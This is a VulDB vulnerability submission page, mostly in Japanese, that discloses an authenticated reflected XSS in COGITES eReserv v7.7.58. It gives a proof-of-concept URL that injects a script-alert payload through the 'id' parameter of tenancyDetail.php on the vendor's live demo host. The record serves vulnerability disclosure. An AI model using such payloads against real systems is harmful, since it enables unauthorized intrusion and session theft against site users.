提出 #274372: COGITES eReserv v7.7.58 Reflected XSS (authenticated)情報

タイトルCOGITES eReserv v7.7.58 Reflected XSS (authenticated)
説明You will have to authenticate to their demo online for the purpose of this PoC On admin panel (Authenticated): The "id=" parameter on tenancyDetail.php is vulnerable to reflected XSS. proof of concept: https://my.e-reserv.com/00000000ereservpro/front/admin/tenancyDetail.php?id=id=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
ユーザー
 rubx (UID 62535)
送信2024年01月28日 17:57 (2 年 ago)
モデレーション2024年01月29日 14:35 (21 hours later)
ステータス承諾済み
VulDBエントリ252303 [Cogites eReserv 7.7.58 tenancyDetail.php 識別子 クロスサイトスクリプティング]
ポイント15

Do you want to use VulDB in your project?

Use the official API to access entries easily!